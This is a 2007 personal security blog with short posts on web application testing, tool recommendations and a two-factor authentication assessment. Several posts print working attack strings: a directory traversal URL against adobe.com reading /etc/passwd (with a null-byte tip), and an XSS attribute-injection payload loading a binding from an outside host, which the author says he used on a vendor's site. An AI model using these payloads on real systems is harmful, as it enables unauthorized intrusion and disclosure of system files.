Sunday, September 30, 2007

Have you download your scancode?

I was reading on Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he teaches the audience from dependency determination to mitigation and countermeasures of a web application. On top of it, he included a tool where he coded himself called "scancode" which is used to scan source codes for potential entry point for XSS and SQLi. This is a must read for those who wants to know more about source code reviewing process and methoddology. Download scancode at page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days, i am so involved with application security and neglected on the networking area. Well, i am trying to shift myself slowly away from the technical side of things and wish to involve more in business and development stuff. However, still i will keep myself abreast of the latest stuff that is going around in the security world.

The Hacka Man

Adobe Directory Traversal???????

The other night Christ1an showed me a link of Adobe.com with directory traversal. It was an old exploit, however it works on Adobe. This showed how Adobe is not taking application security seriously. Well, i managed to saw the entire /etc/passwd file and DAMN!! i did not take a screen shot of it. I was too careless and excited not to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well check out the exploit here that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string i used few nights ago.

The Hacka Man

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as the hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing, however i am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hashing string into the form, and the program will fetch the hashing algorithm used. This is rather useful. Because once you know the hashing algorithm, you can then use cracking software to crack for the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man

Friday, September 28, 2007

Can Your Machine Be Hacked?

Last night, i received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provide users with ideas of how to secure holes in your PC. There are 12 tests and all of which gave an rough idea of how to secure your machine. Well, i would say it is a good start for those who wants to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Thursday, September 27, 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com, it is definitely a site worth visiting. With great in depth articles to simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj.Shah, an ex employee of Foundstone USA. Google him and you will know how powerful is he:)

The Hacka Man

XSS on a vendors website

I am still testing on the application for flaws. However, it is so secure that i can't do a single thing. In the end, i end up testing a vendors site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when i view the source code. I was dejected as i knew there is something more i can do. A few minutes later, .mario was online and i told him about my problem. Immediatedly, he came up with a trick that allows XSS to happen. So in the end, i entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into the one of the form fields and when i view the source code, it was totally injected! This was what it displayed on the source code

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man

Tuesday, September 25, 2007

2 Factor Authentication Update

I don't believe this, i can't basically do a SQL injection, CSRF or XSS! Everything i wanted to do is basically either encrypted or if i injection a simple character like ", it says service unavailable. This application can be considered very secure it terms of encryption and of good standard if weighing it against the OWASP top ten. Even if i enter a value like 10, this value will be encrypted with this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running outta ideas, tell me what more can i do??

The Hacka Man

2 Factor Authentication Day 2

Damn, its getting tough! Have you guys seen a 6 digit password with an encrypted
string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, there is nothing more i can do? I dunno, still thinking:?????

The Hacka Man

Monday, September 24, 2007

2 Factor Authentication?

Well, if you guys asked me if why i havent been updating my blog? I can only say that there is so much to be done in work and of course reading a lot on Rsnake's XSS exploit and defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well back to the main topic, i had been assigned to hack an application with 2 factor authentication. Damn, all i can say is it is very secure it terms of randomness in session id, hidden fields and encryption. There is no way i can break the application's login page and the only thing i found is only a jar file with lotsa class files inside. Well, i know i can use a java decompiler like jad to get the source code but i did not because i am concentrating more on finding vulnerabilities. Hmz....I will continue with part 2 tomorrow. Firefox is a very cool tool to do web hacking. Install the following extentions guys

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Monday, September 3, 2007

Sam, Wireless Hacking, Updates

Its been a long time since i last updated my blog. I had been so busy these days with my current job. From planning to hacking. Also, i had been reading on Rsnake's and Jeremiah's book on XSS Exploit and Defence. It is a good book with great examples, however, there are some parts that i don't quite understand and i am still trying to catch up. Well, Sam, if you are reading this, check out this url below for your wireless audit.

http://www.leetupload.com/tutorials/hackingspoonfed/part1

The Hacka Man